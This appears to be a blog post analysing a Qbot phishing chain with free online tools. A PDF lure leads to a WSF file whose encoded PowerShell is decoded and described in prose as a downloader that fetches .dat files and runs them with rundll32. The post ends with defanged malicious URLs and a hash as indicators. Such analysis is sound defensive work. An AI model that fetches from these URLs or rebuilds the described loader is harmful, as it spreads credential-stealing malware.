Analyzing Malware using FREE Online Tools

I came across an interesting PDF today which I would like to analyze for you. However, I decided to do something a little different today and do the analysis only using free online tools.

Although this method might not be as technically exhaustive as analyzing the malware on a dedicated VM for malware analysis or in a disassembler, sometimes you might not have access to all your fancy tools and might need to do quick and dirty analysis to investigate some malicious document.

Let’s start with Any Run. As we can see the file is a standard phishing template PDF that instructs the victim to “click on the button” to download additional files. It is masquerading itself as a document containing protected files.

After clicking the “OPEN” button on the PDF, the archive (.zip file in the screenshot) gets downloaded. When we extract the contents of the archive we are left with the IP-August.14.wsf (Windows Script File).

A Windows Script File (WSF) is a file format used to create script files that can be executed on Windows operating systems. WSF files are written using scripting languages such as VBScript or JScript, and are saved with a .wsf file extension.

WSF files can be executed from the command line, from a batch file, or from within another script file. They can also be scheduled to run automatically using the Windows Task Scheduler. WSF files are also commonly used to automate tasks or perform administrative functions on Windows systems. They can be used to perform a wide range of tasks, such as system maintenance, file management, and network administration.

However, in our case, WSF seems to be running another Powershell script.

Powershell.exe is used to run an encoded command. Let's move over to CyberChef to decode the payload and better understand what is going on.

After Base64 decodes the payload we can already see the script, let’s try to make it prettier and get rid of those unprintable characters.

Again we use CyberChef for this task. More specifically I decoded the previous output using UTF-16LE (1200). From here we get our malicious Powershell script.

Let’s try to make sense of this:

1. Script uses the Start-Sleep cmdlet to pause the script execution for 2 seconds.
2. It defines an array variable named $samplings which contains a list of URLs separated by commas. These URLs seem to be pointing to files with the ".dat" extension.
3. It uses a foreach loop to iterate over each URL in the $samplings array.
4. Inside the loop, it uses the wget command to download the file from the current URL to the $env:TEMP\ObelisedHitlerian.reconsultSurgiest file path. It specifies a 16-second timeout for the download.
5. If the downloaded file is greater than or equal to 100,000 bytes in size, it starts the rundll32 command with the $env:TEMP\\ObelisedHitlerian.reconsultSurgiest,Nikn argument and breaks out of the loop.
6. If the download fails, it waits for 2 seconds before trying the next URL in the $samplings array.

Now that we have a good idea of what to expect, we can copy the decoded Powershell payload, go back to Any.run and run it!

Running the payload results in just what we expected. Additional .dat files are downloaded.

And voila! Any.run already has detection and identifies the Qbot malware!

QBot (also known as Qakbot) is a type of malware that is designed to steal sensitive information from infected systems. It is typically spread through phishing emails that contain a malicious attachment or a link to a fake website that downloads the malware. Once installed on a system, QBot is able to steal passwords, financial data, and other sensitive information. It can also be used to deploy additional malware, such as ransomware or banking trojans.

QBot is known for its ability to evade detection and persist on infected systems, making it difficult to remove. It uses advanced techniques to avoid detection by antivirus software, including encrypting its code, using rootkit functionality, and manipulating system files and processes.

QBot has been a persistent threat since it first appeared in 2009, and has undergone several iterations over the years. It is primarily targeted at businesses and organizations, and has been responsible for several high-profile data breaches. To protect against QBot and other types of malware, it is important to use up-to-date antivirus software, practice safe browsing habits, and be cautious when opening email attachments or clicking on links from unknown senders.

Happy Hacking!

IOCs

http://45.159.249[.]33/VGvEJmvPle.dat

http://87.236.146[.]34/JuNcfUn.dat

http://5.42.221[.]124/2YmoHXsDbim.dat

http://45.66.248[.]187/Q69XwN.dat

http://149.102.243[.]204/EHCLBNYXWgv.dat

http://51.222.199[.]244/wx2O00LYFuvd.dat

http://hos.com[.]pk/blo/6434f8323b119.zip

6598bbdb024699fbd53f11b3ea3d799c